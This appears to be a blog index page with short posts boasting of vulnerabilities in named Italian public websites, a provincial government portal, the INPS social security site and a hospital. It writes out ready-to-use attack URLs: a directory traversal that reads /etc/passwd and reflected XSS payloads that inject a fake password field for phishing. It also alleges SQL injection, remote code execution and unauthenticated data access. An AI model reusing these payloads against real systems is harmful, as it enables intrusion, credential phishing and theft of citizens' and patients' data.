pro(re)gress

Posts

Showing posts with the label sql injections

provincia.benevento.it - directory traversal - sql injections - remote code execution

Yes ... "you are so cool" phpnuke was not so cool. :) http://www.provincia.benevento.it/?name=Search&file=../../../../../../../../../etc/passwd php-stats remote execution in admin.php| sql injections http://www.provincia.benevento.it/stats/

INPS - xss, spam/phishing, sql injection, CSRF, users' data access(no auth)

Possible spam/phishing http://www.inps.it//newportal/default.aspx?txtNumero=%22%3Epassword:%20%3Cinput%20type=%22text%22%3E%3Cinput%20type=%22submit%22%3E%3C%22&txtTesto=%20test%3E&undefined=TROVA&sTrova=ultime%20circolari&sCategoria=3&cboAnno=Abc123&cboDal=Abc123&cboAl=Abc123&cboOrdina=Data%20crescente#02067624055715922812 http://www.inps.it//newportal/default.aspx?txtNumero=2&txtTesto=%20rantolo">%3E&undefined=TROVA&sTrova=ultime%20circolari&sCategoria=3&cboAnno=Abc123&cboDal=Abc123&cboAl=Abc123&cboOrdina=Data%20crescente#02067624055715922812 http://www.inps.it//newportal/default.aspx?txtNumero=2&txtTesto=%20rantolo">%3E&undefined=TROVA&sTrova=ultime%20circolari&sCategoria=3&cboAnno=Abc123&cboDal=Abc123&cboAl=Abc123&cboOrdina=Data%20crescente#02067624055715922812 http://www.inps.it//newportal/default.aspx?txtNumero=2&cboAnno=&cboDal=%22%3E1979&cboAl=2011&a

policlinico umberto 1 - xss - sql injections

a fex xss a possible sql injection (oracle dbms) in http://www.policlinicoumberto1.it/PR_Item.asp